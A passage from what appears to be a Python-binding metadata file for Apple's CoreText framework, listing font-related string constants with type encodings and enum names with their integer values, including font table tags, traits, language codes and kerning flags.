kCTFontDescriptorMatchingDescriptors@^{__CFString=}$kCTFontDescriptorMatchingError@^{__CFString=}$kCTFontDescriptorMatchingPercentage@^{__CFString=}$kCTFontDescriptorMatchingResult@^{__CFString=}$kCTFontDescriptorMatchingSourceDescriptor@^{__CFString=}$kCTFontDescriptorMatchingTotalAssetSize@^{__CFString=}$kCTFontDescriptorMatchingTotalDownloadedSize@^{__CFString=}$kCTFontDesignerNameKey@^{__CFString=}$kCTFontDesignerURLNameKey@^{__CFString=}$kCTFontDisplayNameAttribute@^{__CFString=}$kCTFontDownloadableAttribute@^{__CFString=}$kCTFontDownloadedAttribute@^{__CFString=}$kCTFontEnabledAttribute@^{__CFString=}$kCTFontFamilyNameAttribute@^{__CFString=}$kCTFontFamilyNameKey@^{__CFString=}$kCTFontFeatureSampleTextKey@^{__CFString=}$kCTFontFeatureSelectorDefaultKey@^{__CFString=}$kCTFontFeatureSelectorIdentifierKey@^{__CFString=}$kCTFontFeatureSelectorNameKey@^{__CFString=}$kCTFontFeatureSelectorSettingKey@^{__CFString=}$kCTFontFeatureSettingsAttribute@^{__CFString=}$kCTFontFeatureTooltipTextKey@^{__CFString=}$kCTFontFeatureTypeExclusiveKey@^{__CFString=}$kCTFontFeatureTypeIdentifierKey@^{__CFString=}$kCTFontFeatureTypeNameKey@^{__CFString=}$kCTFontFeatureTypeSelectorsKey@^{__CFString=}$kCTFontFeaturesAttribute@^{__CFString=}$kCTFontFixedAdvanceAttribute@^{__CFString=}$kCTFontFormatAttribute@^{__CFString=}$kCTFontFullNameKey@^{__CFString=}$kCTFontLanguagesAttribute@^{__CFString=}$kCTFontLicenseNameKey@^{__CFString=}$kCTFontLicenseURLNameKey@^{__CFString=}$kCTFontMacintoshEncodingsAttribute@^{__CFString=}$kCTFontManagerBundleIdentifier@^{__CFString=}$kCTFontManagerErrorDomain@^{__CFString=}$kCTFontManagerErrorFontAssetNameKey@^{__CFString=}$kCTFontManagerErrorFontDescriptorsKey@^{__CFString=}$kCTFontManagerErrorFontURLsKey@^{__CFString=}$kCTFontManagerRegisteredFontsChangedNotification@^{__CFString=}$kCTFontManufacturerNameKey@^{__CFString=}$kCTFontMatrixAttribute@^{__CFString=}$kCTFontNameAttribute@^{__CFString=}$kCTFontOpenType
FeatureTag@^{__CFString=}$kCTFontOpenTypeFeatureValue@^{__CFString=}$kCTFontOrientationAttribute@^{__CFString=}$kCTFontPostScriptCIDNameKey@^{__CFString=}$kCTFontPostScriptNameKey@^{__CFString=}$kCTFontPriorityAttribute@^{__CFString=}$kCTFontRegistrationScopeAttribute@^{__CFString=}$kCTFontRegistrationUserInfoAttribute@^{__CFString=}$kCTFontSampleTextNameKey@^{__CFString=}$kCTFontSizeAttribute@^{__CFString=}$kCTFontSlantTrait@^{__CFString=}$kCTFontStyleNameAttribute@^{__CFString=}$kCTFontStyleNameKey@^{__CFString=}$kCTFontSubFamilyNameKey@^{__CFString=}$kCTFontSymbolicTrait@^{__CFString=}$kCTFontTrademarkNameKey@^{__CFString=}$kCTFontTraitsAttribute@^{__CFString=}$kCTFontURLAttribute@^{__CFString=}$kCTFontUniqueNameKey@^{__CFString=}$kCTFontVariationAttribute@^{__CFString=}$kCTFontVariationAxisDefaultValueKey@^{__CFString=}$kCTFontVariationAxisHiddenKey@^{__CFString=}$kCTFontVariationAxisIdentifierKey@^{__CFString=}$kCTFontVariationAxisMaximumValueKey@^{__CFString=}$kCTFontVariationAxisMinimumValueKey@^{__CFString=}$kCTFontVariationAxisNameKey@^{__CFString=}$kCTFontVendorURLNameKey@^{__CFString=}$kCTFontVersionNameKey@^{__CFString=}$kCTFontWeightTrait@^{__CFString=}$kCTFontWidthTrait@^{__CFString=}$kCTForegroundColorAttributeName@^{__CFString=}$kCTForegroundColorFromContextAttributeName@^{__CFString=}$kCTFrameClippingPathsAttributeName@^{__CFString=}$kCTFramePathClippingPathAttributeName@^{__CFString=}$kCTFramePathFillRuleAttributeName@^{__CFString=}$kCTFramePathWidthAttributeName@^{__CFString=}$kCTFrameProgressionAttributeName@^{__CFString=}$kCTGlyphInfoAttributeName@^{__CFString=}$kCTHorizontalInVerticalFormsAttributeName@^{__CFString=}$kCTKernAttributeName@^{__CFString=}$kCTLanguageAttributeName@^{__CFString=}$kCTLigatureAttributeName@^{__CFString=}$kCTParagraphStyleAttributeName@^{__CFString=}$kCTRubyAnnotationAttributeName@^{__CFString=}$kCTRubyAnnotationScaleToFitAttributeName@^{__CFString=}$kCTRubyAnnotationSizeFactorAttributeName@^{__CFString=}$kCTRunDelegateAttributeName@^{__CFString=}$kCTStrokeColorAttributeName@^{__CFString=}$kCTStrokeWidthAttributeName@^{__CFString=}$kCTSuperscriptAttributeName@^{__CFString=}$kCTTabColumnTerminatorsAttributeName@^{__CFString=}$kCTTrackingAttributeName@^{__CFString=}$kCTTypesetterOptionAllowUnboundedLayout@^{__CFString=}$kCTTypesetterOptionDisableBidiProcessing@^{__CFString=}$kCTTypesetterOptionForcedEmbeddingLevel@^{__CFString=}$kCTUnderlineColorAttributeName@^{__CFString=}$kCTUnderlineStyleAttributeName@^{__CFString=}$kCTVerticalFormsAttributeName@^{__CFString=}$kCTWritingDirectionAttributeName@^{__CFString=}$''' enums = 
'''$cmapFontTableTag@1668112752$descriptorFontTableTag@1717859171$featureFontTableTag@1717920116$kANKRCurrentVersion@0$kAbbrevSquaredLigaturesOffSelector@15$kAbbrevSquaredLigaturesOnSelector@14$kAllCapsSelector@1$kAllLowerCaseSelector@2$kAllTypeFeaturesOffSelector@1$kAllTypeFeaturesOnSelector@0$kAllTypographicFeaturesType@0$kAltHalfWidthTextSelector@6$kAltProportionalTextSelector@5$kAlternateHorizKanaOffSelector@1$kAlternateHorizKanaOnSelector@0$kAlternateKanaType@34$kAlternateVertKanaOffSelector@3$kAlternateVertKanaOnSelector@2$kAnnotationType@24$kAsteriskToMultiplyOffSelector@3$kAsteriskToMultiplyOnSelector@2$kBSLNControlPointFormatNoMap@2$kBSLNControlPointFormatWithMap@3$kBSLNCurrentVersion@65536$kBSLNDistanceFormatNoMap@0$kBSLNDistanceFormatWithMap@1$kBSLNHangingBaseline@3$kBSLNIdeographicCenterBaseline@1$kBSLNIdeographicHighBaseline@5$kBSLNIdeographicLowBaseline@2$kBSLNLastBaseline@31$kBSLNMathBaseline@4$kBSLNNoBaseline@255$kBSLNNoBaselineOverride@255$kBSLNNumBaselineClasses@32$kBSLNRomanBaseline@0$kBSLNTag@1651731566$kBoxAnnotationSelector@1$kCJKItalicRomanOffSelector@3$kCJKItalicRomanOnSelector@2$kCJKItalicRomanSelector@1$kCJKRomanSpacingType@103$kCJKSymbolAltFiveSelector@5$kCJKSymbolAltFourSelector@4$kCJKSymbolAltOneSelector@1$kCJKSymbolAltThreeSelector@3$kCJKSymbolAltTwoSelector@2$kCJKSymbolAlternativesType@29$kCJKVerticalRomanCenteredSelector@0$kCJKVerticalRomanHBaselineSelector@1$kCJKVerticalRomanPlacementType@31$kCTAdobeCNS1CharacterCollection@1$kCTAdobeGB1CharacterCollection@2$kCTAdobeJapan1CharacterCollection@3$kCTAdobeJapan2CharacterCollection@4$kCTAdobeKorea1CharacterCollection@5$kCTCenterTextAlignment@2$kCTCharacterCollectionAdobeCNS1@1$kCTCharacterCollectionAdobeGB1@2$kCTCharacterCollectionAdobeJapan1@3$kCTCharacterCollectionAdobeJapan2@4$kCTCharacterCollectionAdobeKorea1@5$kCTCharacterCollectionIdentityMapping@0$kCTFontAlertHeaderFontType@18$kCTFontApplicationFontType@9$kCTFontBoldTrait@2$kCTFontClarendonSerifsClass@1073741824$kCTFontClassClarendonSerifs@1073741824$kCTFontClassFreeformSerifs@1879048192$kCTFontClassMaskShift@28$kCTFontClassMaskTrait@4026531840$kCTFontClassModernSerifs@805306368$kCTFontClassOldStyleSerifs@268435456$kCTFontClassOrnamentals@2415919104$kCTFontClassSansSerif@2147483648$kCTFontClassScripts@2684354560$kCTFontClassSlabSerifs@1342177280$kCTFontClassSymbolic@3221225472$kCTFontClassTransitionalSerifs@536870912$kCTFontClassUnknown@0$kCTFontCollectionCopyDefaultOptions@0$kCTFontCollectionCopyStandardSort@2$kCTFontCollectionCopyUnique@1$kCTFontColorGlyphsTrait@8192$kCTFontCompositeTrait@16384$kCTFontCondensedTrait@64$kCTFontControlContentFontType@26$kCTFontDefaultOrientation@0$kCTFontDescriptorMatchingDidBegin@0$kCTFontDescriptorMatchingDidFailWithError@8$kCTFontDescriptorMatchingDidFinish@1$kCTFontDescriptorMatchingDidFinishDownloading@6$kCTFontDescriptorMatchingDidMatch@7$kCTFontDescriptorMatchingDownloading@5$kCTFontDescriptorMatchingStalled@3$kCTFontDescriptorMatchingWillBeginDownloading@4$kCTFontDescriptorMatchingWillBeginQuerying@2$kCTFontEmphasizedSystemDetailFontType@20$kCTFontEmphasizedSystemFontType@3$kCTFontExpandedTrait@32$kCTFontFormatBitmap@5$kCTFontFormatOpenTypePostScript@1$kCTFontFormatOpenTypeTrueType@2$kCTFontFormatPostScript@4$kCTFontFormatTrueType@3$kCTFontFormatUnrecognized@0$kCTFontFreeformSerifsClass@1879048192$kCTFontHorizontalOrientation@1$kCTFontItalicTrait@1$kCTFontLabelFontType@10$kCTFontManagerAutoActivationDefault@0$kCTFontManagerAutoActivationDisabled@1$kCTFontManagerAutoActivationEnabled@2$kCTFontManagerAutoActivationPro
mptUser@3$kCTFontManagerErrorAlreadyRegistered@105$kCTFontManagerErrorCancelledByUser@304$kCTFontManagerErrorDuplicatedName@305$kCTFontManagerErrorExceededResourceLimit@106$kCTFontManagerErrorFileNotFound@101$kCTFontManagerErrorInUse@202$kCTFontManagerErrorInsufficientInfo@303$kCTFontManagerErrorInsufficientPermissions@102$kCTFontManagerErrorInvalidFilePath@306$kCTFontManagerErrorInvalidFontData@104$kCTFontManagerErrorMissingEntitlement@302$kCTFontManagerErrorNotRegistered@201$kCTFontManagerErrorRegistrationFailed@301$kCTFontManagerErrorSystemRequired@203$kCTFontManagerErrorUnrecognizedFormat@103$kCTFontManagerScopeNone@0$kCTFontManagerScopePersistent@2$kCTFontManagerScopeProcess@1$kCTFontManagerScopeSession@3$kCTFontManagerScopeUser@2$kCTFontMenuItemCmdKeyFontType@14$kCTFontMenuItemFontType@12$kCTFontMenuItemMarkFontType@13$kCTFontMenuTitleFontType@11$kCTFontMessageFontType@23$kCTFontMiniEmphasizedSystemFontType@7$kCTFontMiniSystemFontType@6$kCTFontModernSerifsClass@805306368$kCTFontMonoSpaceTrait@1024$kCTFontNoFontType@4294967295$kCTFontOldStyleSerifsClass@268435456$kCTFontOptionsDefault@0$kCTFontOptionsPreferSystemFont@4$kCTFontOptionsPreventAutoActivation@1$kCTFontOrientationDefault@0$kCTFontOrientationHorizontal@1$kCTFontOrientationVertical@2$kCTFontOrnamentalsClass@2415919104$kCTFontPaletteFontType@24$kCTFontPriorityComputer@30000$kCTFontPriorityDynamic@50000$kCTFontPriorityNetwork@20000$kCTFontPriorityProcess@60000$kCTFontPrioritySystem@10000$kCTFontPriorityUser@40000$kCTFontPushButtonFontType@16$kCTFontSansSerifClass@2147483648$kCTFontScriptsClass@2684354560$kCTFontSlabSerifsClass@1342177280$kCTFontSmallEmphasizedSystemFontType@5$kCTFontSmallSystemFontType@4$kCTFontSmallToolbarFontType@22$kCTFontSymbolicClass@3221225472$kCTFontSystemDetailFontType@19$kCTFontSystemFontType@2$kCTFontTableAcnt@1633906292$kCTFontTableAnkr@1634626418$kCTFontTableAvar@1635148146$kCTFontTableBASE@1111577413$kCTFontTableBdat@1650745716$kCTFontTableBhed@1651008868$kCTFontTableBloc@1651273571$kCTFontTableBsln@1651731566$kCTFontTableCBDT@1128416340$kCTFontTableCBLC@1128418371$kCTFontTableCFF@1128678944$kCTFontTableCFF2@1128678962$kCTFontTableCOLR@1129270354$kCTFontTableCPAL@1129333068$kCTFontTableCidg@1667851367$kCTFontTableCmap@1668112752$kCTFontTableCvar@1668702578$kCTFontTableCvt@1668707360$kCTFontTableDSIG@1146308935$kCTFontTableEBDT@1161970772$kCTFontTableEBLC@1161972803$kCTFontTableEBSC@1161974595$kCTFontTableFdsc@1717859171$kCTFontTableFeat@1717920116$kCTFontTableFmtx@1718449272$kCTFontTableFond@1718578788$kCTFontTableFpgm@1718642541$kCTFontTableFvar@1719034226$kCTFontTableGDEF@1195656518$kCTFontTableGPOS@1196445523$kCTFontTableGSUB@1196643650$kCTFontTableGasp@1734439792$kCTFontTableGlyf@1735162214$kCTFontTableGvar@1735811442$kCTFontTableHVAR@1213612370$kCTFontTableHdmx@1751412088$kCTFontTableHead@1751474532$kCTFontTableHhea@1751672161$kCTFontTableHmtx@1752003704$kCTFontTableHsty@1752396921$kCTFontTableJSTF@1246975046$kCTFontTableJust@1786082164$kCTFontTableKern@1801810542$kCTFontTableKerx@1801810552$kCTFontTableLTSH@1280594760$kCTFontTableLcar@1818452338$kCTFontTableLoca@1819239265$kCTFontTableLtag@1819566439$kCTFontTableMATH@1296127048$kCTFontTableMERG@1296388679$kCTFontTableMVAR@1297498450$kCTFontTableMaxp@1835104368$kCTFontTableMeta@1835365473$kCTFontTableMort@1836020340$kCTFontTableMorx@1836020344$kCTFontTableName@1851878757$kCTFontTableOS2@1330851634$kCTFontTableOpbd@1869636196$kCTFontTableOptionExcludeSynthetic@1$kCTFontTableOptionNoOptions@0$kCTFontTablePCLT@1346587732$kCTFontTablePost@188635224
4$kCTFontTablePrep@1886545264$kCTFontTableProp@1886547824$kCTFontTableSTAT@1398030676$kCTFontTableSVG@1398163232$kCTFontTableSbit@1935829364$kCTFontTableSbix@1935829368$kCTFontTableTrak@1953653099$kCTFontTableVDMX@1447316824$kCTFontTableVORG@1448038983$kCTFontTableVVAR@1448493394$kCTFontTableVhea@1986553185$kCTFontTableVmtx@1986884728$kCTFontTableXref@2020762982$kCTFontTableZapf@1516335206$kCTFontToolTipFontType@25$kCTFontToolbarFontType@21$kCTFontTraitBold@2$kCTFontTraitClassMask@4026531840$kCTFontTraitColorGlyphs@8192$kCTFontTraitComposite@16384$kCTFontTraitCondensed@64$kCTFontTraitExpanded@32$kCTFontTraitItalic@1$kCTFontTraitMonoSpace@1024$kCTFontTraitUIOptimized@4096$kCTFontTraitVertical@2048$kCTFontTransitionalSerifsClass@536870912$kCTFontUIFontAlertHeader@18$kCTFontUIFontApplication@9$kCTFontUIFontControlContent@26$kCTFontUIFontEmphasizedSystem@3$kCTFontUIFontEmphasizedSystemDetail@20$kCTFontUIFontLabel@10$kCTFontUIFontMenuItem@12$kCTFontUIFontMenuItemCmdKey@14$kCTFontUIFontMenuItemMark@13$kCTFontUIFontMenuTitle@11$kCTFontUIFontMessage@23$kCTFontUIFontMiniEmphasizedSystem@7$kCTFontUIFontMiniSystem@6$kCTFontUIFontNone@4294967295$kCTFontUIFontPalette@24$kCTFontUIFontPushButton@16$kCTFontUIFontSmallEmphasizedSystem@5$kCTFontUIFontSmallSystem@4$kCTFontUIFontSmallToolbar@22$kCTFontUIFontSystem@2$kCTFontUIFontSystemDetail@19$kCTFontUIFontToolTip@25$kCTFontUIFontToolbar@21$kCTFontUIFontUser@0$kCTFontUIFontUserFixedPitch@1$kCTFontUIFontUtilityWindowTitle@17$kCTFontUIFontViews@8$kCTFontUIFontWindowTitle@15$kCTFontUIOptimizedTrait@4096$kCTFontUnknownClass@0$kCTFontUserFixedPitchFontType@1$kCTFontUserFontType@0$kCTFontUtilityWindowTitleFontType@17$kCTFontVerticalOrientation@2$kCTFontVerticalTrait@2048$kCTFontViewsFontType@8$kCTFontWindowTitleFontType@15$kCTFramePathFillEvenOdd@0$kCTFramePathFillWindingNumber@1$kCTFrameProgressionLeftToRight@2$kCTFrameProgressionRightToLeft@1$kCTFrameProgressionTopToBottom@0$kCTIdentityMappingCharacterCollection@0$kCTJustifiedTextAlignment@3$kCTLeftTextAlignment@0$kCTLineBoundsExcludeTypographicLeading@1$kCTLineBoundsExcludeTypographicShifts@2$kCTLineBoundsIncludeLanguageExtents@32$kCTLineBoundsUseGlyphPathBounds@8$kCTLineBoundsUseHangingPunctuation@4$kCTLineBoundsUseOpticalBounds@16$kCTLineBreakByCharWrapping@1$kCTLineBreakByClipping@2$kCTLineBreakByTruncatingHead@3$kCTLineBreakByTruncatingMiddle@5$kCTLineBreakByTruncatingTail@4$kCTLineBreakByWordWrapping@0$kCTLineTruncationEnd@1$kCTLineTruncationMiddle@2$kCTLineTruncationStart@0$kCTNaturalTextAlignment@4$kCTParagraphStyleSpecifierAlignment@0$kCTParagraphStyleSpecifierBaseWritingDirection@13$kCTParagraphStyleSpecifierCount@18$kCTParagraphStyleSpecifierDefaultTabInterval@5$kCTParagraphStyleSpecifierFirstLineHeadIndent@1$kCTParagraphStyleSpecifierHeadIndent@2$kCTParagraphStyleSpecifierLineBoundsOptions@17$kCTParagraphStyleSpecifierLineBreakMode@6$kCTParagraphStyleSpecifierLineHeightMultiple@7$kCTParagraphStyleSpecifierLineSpacing@10$kCTParagraphStyleSpecifierLineSpacingAdjustment@16$kCTParagraphStyleSpecifierMaximumLineHeight@8$kCTParagraphStyleSpecifierMaximumLineSpacing@14$kCTParagraphStyleSpecifierMinimumLineHeight@9$kCTParagraphStyleSpecifierMinimumLineSpacing@15$kCTParagraphStyleSpecifierParagraphSpacing@11$kCTParagraphStyleSpecifierParagraphSpacingBefore@12$kCTParagraphStyleSpecifierTabStops@4$kCTParagraphStyleSpecifierTailIndent@3$kCTRightTextAlignment@1$kCTRubyAlignmentAuto@0$kCTRubyAlignmentCenter@2$kCTRubyAlignmentDistributeLetter@4$kCTRubyAlignmentDistributeSpace@5$kCTRubyAlignmentEnd@3$kCTRubyAlignment
Invalid@255$kCTRubyAlignmentLineEdge@6$kCTRubyAlignmentStart@1$kCTRubyOverhangAuto@0$kCTRubyOverhangEnd@2$kCTRubyOverhangInvalid@255$kCTRubyOverhangNone@3$kCTRubyOverhangStart@1$kCTRubyPositionAfter@1$kCTRubyPositionBefore@0$kCTRubyPositionCount@4$kCTRubyPositionInline@3$kCTRubyPositionInterCharacter@2$kCTRunDelegateCurrentVersion@1$kCTRunDelegateVersion1@1$kCTRunStatusHasNonIdentityMatrix@4$kCTRunStatusNoStatus@0$kCTRunStatusNonMonotonic@2$kCTRunStatusRightToLeft@1$kCTTextAlignmentCenter@2$kCTTextAlignmentJustified@3$kCTTextAlignmentLeft@0$kCTTextAlignmentNatural@4$kCTTextAlignmentRight@1$kCTUnderlinePatternDash@512$kCTUnderlinePatternDashDot@768$kCTUnderlinePatternDashDotDot@1024$kCTUnderlinePatternDot@256$kCTUnderlinePatternSolid@0$kCTUnderlineStyleDouble@9$kCTUnderlineStyleNone@0$kCTUnderlineStyleSingle@1$kCTUnderlineStyleThick@2$kCTVersionNumber10_10@458752$kCTVersionNumber10_11@524288$kCTVersionNumber10_12@589824$kCTVersionNumber10_13@655360$kCTVersionNumber10_14@720896$kCTVersionNumber10_15@786432$kCTVersionNumber10_5@131072$kCTVersionNumber10_5_2@131073$kCTVersionNumber10_5_3@131074$kCTVersionNumber10_5_5@131075$kCTVersionNumber10_6@196608$kCTVersionNumber10_6_7@196615$kCTVersionNumber10_7@262144$kCTVersionNumber10_8@327680$kCTVersionNumber10_9@393216$kCTWritingDirectionEmbedding@0$kCTWritingDirectionLeftToRight@0$kCTWritingDirectionNatural@-1$kCTWritingDirectionOverride@2$kCTWritingDirectionRightToLeft@1$kCanonicalCompositionOffSelector@1$kCanonicalCompositionOnSelector@0$kCaseSensitiveLayoutOffSelector@1$kCaseSensitiveLayoutOnSelector@0$kCaseSensitiveLayoutType@33$kCaseSensitiveSpacingOffSelector@3$kCaseSensitiveSpacingOnSelector@2$kCharacterAlternativesType@17$kCharacterShapeType@20$kCircleAnnotationSelector@3$kCommonLigaturesOffSelector@3$kCommonLigaturesOnSelector@2$kCompatibilityCompositionOffSelector@3$kCompatibilityCompositionOnSelector@2$kContextualAlternatesOffSelector@1$kContextualAlternatesOnSelector@0$kContextualAlternatesType@36$kContextualLigaturesOffSelector@19$kContextualLigaturesOnSelector@18$kContextualSwashAlternatesOffSelector@5$kContextualSwashAlternatesOnSelector@4$kCursiveConnectionType@2$kCursiveSelector@2$kDecomposeDiacriticsSelector@2$kDecorativeBordersSelector@4$kDefaultCJKRomanSelector@2$kDefaultLowerCaseSelector@0$kDefaultUpperCaseSelector@0$kDesignComplexityType@18$kDesignLevel1Selector@0$kDesignLevel2Selector@1$kDesignLevel3Selector@2$kDesignLevel4Selector@3$kDesignLevel5Selector@4$kDiacriticsType@9$kDiagonalFractionsSelector@2$kDiamondAnnotationSelector@8$kDingbatsSelector@1$kDiphthongLigaturesOffSelector@11$kDiphthongLigaturesOnSelector@10$kDisplayTextSelector@1$kEngravedTextSelector@2$kExpertCharactersSelector@10$kExponentsOffSelector@9$kExponentsOnSelector@8$kFleuronsSelector@3$kFontAlbanianLanguage@36$kFontAmharicLanguage@85$kFontAmharicScript@28$kFontArabicLanguage@12$kFontArabicScript@4$kFontArmenianLanguage@51$kFontArmenianScript@24$kFontAssameseLanguage@68$kFontAymaraLanguage@134$kFontAzerbaijanArLanguage@50$kFontAzerbaijaniLanguage@49$kFontBasqueLanguage@129$kFontBengaliLanguage@67$kFontBengaliScript@13$kFontBulgarianLanguage@44$kFontBurmeseLanguage@77$kFontBurmeseScript@19$kFontByelorussianLanguage@46$kFontCatalanLanguage@130$kFontChewaLanguage@92$kFontChineseScript@2$kFontCopyrightName@0$kFontCroatianLanguage@18$kFontCustom16BitScript@2$kFontCustom816BitScript@1$kFontCustom8BitScript@0$kFontCustomPlatform@4$kFontCyrillicScript@7$kFontCzechLanguage@38$kFontDanishLanguage@7$kFontDescriptionName@10$kFontDesignerName@9$kFontDesignerURLName@12$
kFontDevanagariScript@9$kFontDutchLanguage@4$kFontDzongkhaLanguage@137$kFontEastEuropeanRomanScript@29$kFontEnglishLanguage@0$kFontEsperantoLanguage@94$kFontEstonianLanguage@27$kFontEthiopicScript@28$kFontExtendedArabicScript@31$kFontFaeroeseLanguage@30$kFontFamilyName@1$kFontFarsiLanguage@31$kFontFinnishLanguage@13$kFontFlemishLanguage@34$kFontFrenchLanguage@1$kFontFullName@4$kFontGallaLanguage@87$kFontGeezScript@28$kFontGeorgianLanguage@52$kFontGeorgianScript@23$kFontGermanLanguage@2$kFontGreekLanguage@14$kFontGreekScript@6$kFontGuaraniLanguage@133$kFontGujaratiLanguage@69$kFontGujaratiScript@11$kFontGurmukhiScript@10$kFontHebrewLanguage@10$kFontHebrewScript@5$kFontHindiLanguage@21$kFontHungarianLanguage@26$kFontISO10646_1993Semantics@2$kFontIcelandicLanguage@15$kFontIndonesianLanguage@81$kFontIrishLanguage@35$kFontItalianLanguage@3$kFontJapaneseLanguage@11$kFontJapaneseScript@1$kFontJavaneseRomLanguage@138$kFontKannadaLanguage@73$kFontKannadaScript@16$kFontKashmiriLanguage@61$kFontKazakhLanguage@48$kFontKhmerLanguage@78$kFontKhmerScript@20$kFontKirghizLanguage@54$kFontKoreanLanguage@23$kFontKoreanScript@3$kFontKurdishLanguage@60$kFontLaoLanguage@79$kFontLaotianScript@22$kFontLappishLanguage@29$kFontLastReservedName@255$kFontLatinLanguage@131$kFontLatvianLanguage@28$kFontLettishLanguage@28$kFontLicenseDescriptionName@13$kFontLicenseInfoURLName@14$kFontLithuanianLanguage@24$kFontMacCompatibleFullName@18$kFontMacedonianLanguage@43$kFontMacintoshPlatform@1$kFontMalagasyLanguage@93$kFontMalayArabicLanguage@84$kFontMalayRomanLanguage@83$kFontMalayalamLanguage@72$kFontMalayalamScript@17$kFontMalteseLanguage@16$kFontManufacturerName@8$kFontMarathiLanguage@66$kFontMicrosoftPlatform@3$kFontMicrosoftStandardScript@1$kFontMicrosoftSymbolScript@0$kFontMicrosoftUCS4Script@10$kFontMoldavianLanguage@53$kFontMongolianCyrLanguage@58$kFontMongolianLanguage@57$kFontMongolianScript@27$kFontNepaliLanguage@64$kFontNoLanguageCode@4294967295$kFontNoNameCode@4294967295$kFontNoPlatformCode@4294967295$kFontNoScriptCode@4294967295$kFontNorwegianLanguage@9$kFontOriyaLanguage@71$kFontOriyaScript@12$kFontOromoLanguage@87$kFontPashtoLanguage@59$kFontPersianLanguage@31$kFontPolishLanguage@25$kFontPortugueseLanguage@8$kFontPostScriptCIDName@20$kFontPostscriptName@6$kFontPreferredFamilyName@16$kFontPreferredSubfamilyName@17$kFontPunjabiLanguage@70$kFontQuechuaLanguage@132$kFontRSymbolScript@8$kFontReservedPlatform@2$kFontRomanScript@0$kFontRomanianLanguage@37$kFontRuandaLanguage@90$kFontRundiLanguage@91$kFontRussian@7$kFontRussianLanguage@32$kFontSaamiskLanguage@29$kFontSampleTextName@19$kFontSanskritLanguage@65$kFontSerbianLanguage@42$kFontSimpChineseLanguage@33$kFontSimpleChineseScript@25$kFontSindhiLanguage@62$kFontSindhiScript@31$kFontSinhaleseLanguage@76$kFontSinhaleseScript@18$kFontSlavicScript@29$kFontSlovakLanguage@39$kFontSlovenianLanguage@40$kFontSomaliLanguage@88$kFontSpanishLanguage@6$kFontStyleName@2$kFontSundaneseRomLanguage@139$kFontSwahiliLanguage@89$kFontSwedishLanguage@5$kFontTagalogLanguage@82$kFontTajikiLanguage@55$kFontTamilLanguage@74$kFontTamilScript@14$kFontTatarLanguage@135$kFontTeluguLanguage@75$kFontTeluguScript@15$kFontThaiLanguage@22$kFontThaiScript@21$kFontTibetanLanguage@63$kFontTibetanScript@26$kFontTigrinyaLanguage@86$kFontTradChineseLanguage@19$kFontTrademarkName@7$kFontTraditionalChineseScript@2$kFontTurkishLanguage@17$kFontTurkmenLanguage@56$kFontUighurLanguage@136$kFontUkrainianLanguage@45$kFontUnicodeDefaultSemantics@0$kFontUnicodePlatform@0$kFontUnicodeV1_1Semantics@1$kFontUnicodeV2_0
BMPOnlySemantics@3$kFontUnicodeV2_0FullCoverageSemantics@4$kFontUnicodeV4_0VariationSequenceSemantics@5$kFontUnicode_FullRepertoire@6$kFontUninterpretedScript@32$kFontUniqueName@3$kFontUrduLanguage@20$kFontUzbekLanguage@47$kFontVendorURLName@11$kFontVersionName@5$kFontVietnameseLanguage@80$kFontVietnameseScript@30$kFontWelshLanguage@128$kFontYiddishLanguage@41$kFormInterrobangOffSelector@7$kFormInterrobangOnSelector@6$kFractionsType@11$kFullWidthCJKRomanSelector@3$kFullWidthIdeographsSelector@0$kFullWidthKanaSelector@0$kHalfWidthCJKRomanSelector@0$kHalfWidthIdeographsSelector@2$kHalfWidthTextSelector@2$kHanjaToHangulAltOneSelector@7$kHanjaToHangulAltThreeSelector@9$kHanjaToHangulAltTwoSelector@8$kHanjaToHangulSelector@1$kHideDiacriticsSelector@1$kHiraganaToKatakanaSelector@2$kHistoricalLigaturesOffSelector@21$kHistoricalLigaturesOnSelector@20$kHojoCharactersSelector@12$kHyphenToEnDashOffSelector@3$kHyphenToEnDashOnSelector@2$kHyphenToMinusOffSelector@1$kHyphenToMinusOnSelector@0$kHyphensToEmDashOffSelector@1$kHyphensToEmDashOnSelector@0$kIdeographicAltFiveSelector@5$kIdeographicAltFourSelector@4$kIdeographicAltOneSelector@1$kIdeographicAltThreeSelector@3$kIdeographicAltTwoSelector@2$kIdeographicAlternativesType@30$kIdeographicSpacingType@26$kIlluminatedCapsSelector@3$kInequalityLigaturesOffSelector@7$kInequalityLigaturesOnSelector@6$kInferiorsSelector@2$kInitialCapsAndSmallCapsSelector@5$kInitialCapsSelector@4$kInternationalSymbolsSelector@5$kInvertedBoxAnnotationSelector@9$kInvertedCircleAnnotationSelector@4$kInvertedRoundedBoxAnnotationSelector@10$kItalicCJKRomanType@32$kJIS1978CharactersSelector@2$kJIS1983CharactersSelector@3$kJIS1990CharactersSelector@4$kJIS2004CharactersSelector@11$kJUSTCurrentVersion@65536$kJUSTKashidaPriority@0$kJUSTLetterPriority@2$kJUSTNullPriority@3$kJUSTOverrideLimits@16384$kJUSTOverridePriority@32768$kJUSTOverrideUnlimited@8192$kJUSTPriorityCount@4$kJUSTPriorityMask@3$kJUSTSpacePriority@1$kJUSTStandardFormat@0$kJUSTTag@1786082164$kJUSTUnlimited@4096$kJUSTnoGlyphcode@65535$kJUSTpcConditionalAddAction@2$kJUSTpcDecompositionAction@0$kJUSTpcDuctilityAction@4$kJUSTpcGlyphRepeatAddAction@5$kJUSTpcGlyphStretchAction@3$kJUSTpcUnconditionalAddAction@1$kKERNCrossStream@16384$kKERNCrossStreamResetNote@2$kKERNCurrentVersion@65536$kKERNFormatMask@255$kKERNIndexArray@3$kKERNLineEndKerning@2$kKERNLineStart@1$kKERNNoCrossKerning@4$kKERNNoStakeNote@1$kKERNNotApplied@1$kKERNNotesRequested@8$kKERNOrderedList@0$kKERNResetCrossStream@32768$kKERNSimpleArray@2$kKERNStateTable@1$kKERNTag@1801810542$kKERNUnusedBits@7936$kKERNVariation@8192$kKERNVertical@32768$kKERXActionOffsetMask@16777215$kKERXActionTypeAnchorPoints@1073741824$kKERXActionTypeControlPoints@0$kKERXActionTypeCoordinates@2147483648$kKERXActionTypeMask@3221225472$kKERXControlPoint@4$kKERXCrossStream@1073741824$kKERXCrossStreamResetNote@2$kKERXCurrentVersion@131072$kKERXDescending@268435456$kKERXFormatMask@255$kKERXLineEndKerning@2$kKERXLineStart@1$kKERXNoCrossKerning@4$kKERXNoStakeNote@1$kKERXNotApplied@1$kKERXNotesRequested@8$kKERXOrderedList@0$kKERXResetCrossStream@32768$kKERXSimpleArray@2$kKERXStateTable@1$kKERXTag@1801810552$kKERXUnusedBits@268435200$kKERXUnusedFlags@1056964608$kKERXValuesAreLong@1$kKERXVariation@536870912$kKERXVertical@-2147483648$kKana